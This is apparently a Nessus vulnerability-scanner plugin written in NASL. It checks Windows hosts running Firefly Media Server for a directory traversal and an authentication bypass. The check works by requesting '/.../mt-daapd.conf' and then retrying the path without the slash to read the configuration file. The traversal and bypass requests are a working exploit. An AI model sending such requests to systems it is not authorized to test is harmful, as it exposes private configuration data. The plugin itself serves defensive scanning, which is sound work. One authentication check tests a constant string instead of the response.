#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server is affected by a partial directory traversal
vulnerability. 

Description :

The remote host is running Firefly Media Server, also known as
mt-daapd, a media streaming server. 

The version of Firefly Media Server installed on the remote Windows
host allows an attacker to retrieve arbitrary files, possibly
bypassing authentication, from the parent directory of Firefly's
'admin-root' folder, including the application's configuration file. 

See also :

http://www.securityfocus.com/archive/1/484763/30/0/threaded

Solution :

Unknown at this time. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(29252);
  script_version("$Revision: 1.1 $");

  script_bugtraq_id(26770);

  script_name(english:"Firefly Media Server Partial Directory Traversal and Authentication Bypass Vulnerabilities");
  script_summary(english:"Tries to read mt-daapd.conf");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "os_fingerprint.nasl");
  script_require_keys("Host/OS");
  script_require_ports("Services/www", 9999);

  exit(0);
}


os = get_kb_item("Host/OS");
if (!os || "Windows" >!< os) exit(0);


include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:9999);
if (!get_port_state(port)) exit(0);


# Make sure it looks like Firefly / mt-daapd.
banner = get_http_banner(port:port);
if (
  !banner ||
  ("mt-daapd/" >!< banner && "Firefly Media Server/" >!< banner)
) exit(0);


# Try to exploit the issue to retrieve Firefly's configuration file.
url = "/.../mt-daapd.conf";

req = http_get(item:url, port:port);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if (res == NULL) exit(0);

# If it's protected, try to bypass authentication.
if ("location: /no_access.html")
{
  url = url - "/";

  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
  if (res == NULL) exit(0);
}


# There's a problem if we retrieved the file.
if (
  "[general]" >< res &&
  res =~ "web_root *= *"
)
{
  # Ignore the HTTP headers.
  contents = strstr(res, '\r\n\r\n') - '\r\n\r\n';

  report = string(
    desc,
    "\n\n",
    "Plugin output :\n",
    "\n"
  );
  if (url[0] != "/")
  {
    report = string(
      report,
      "\n",
      "Nessus was able to bypass authentication and retrieve the contents of\n",
      "Firefly's configuration file, mt-daapd.conf, from the remote host :\n"
    );
  }
  else
  {
    report = string(
      report,
      "\n",
      "Here are the contents of Firefly's configuration file, mt-daapd.conf, that\n",
      "Nessus was able to read from the remote host :\n"
    );
  }
  report = string(
    report,
    "\n",
    contents, "\n"
  );
  security_hole(port:port, data:report);
}
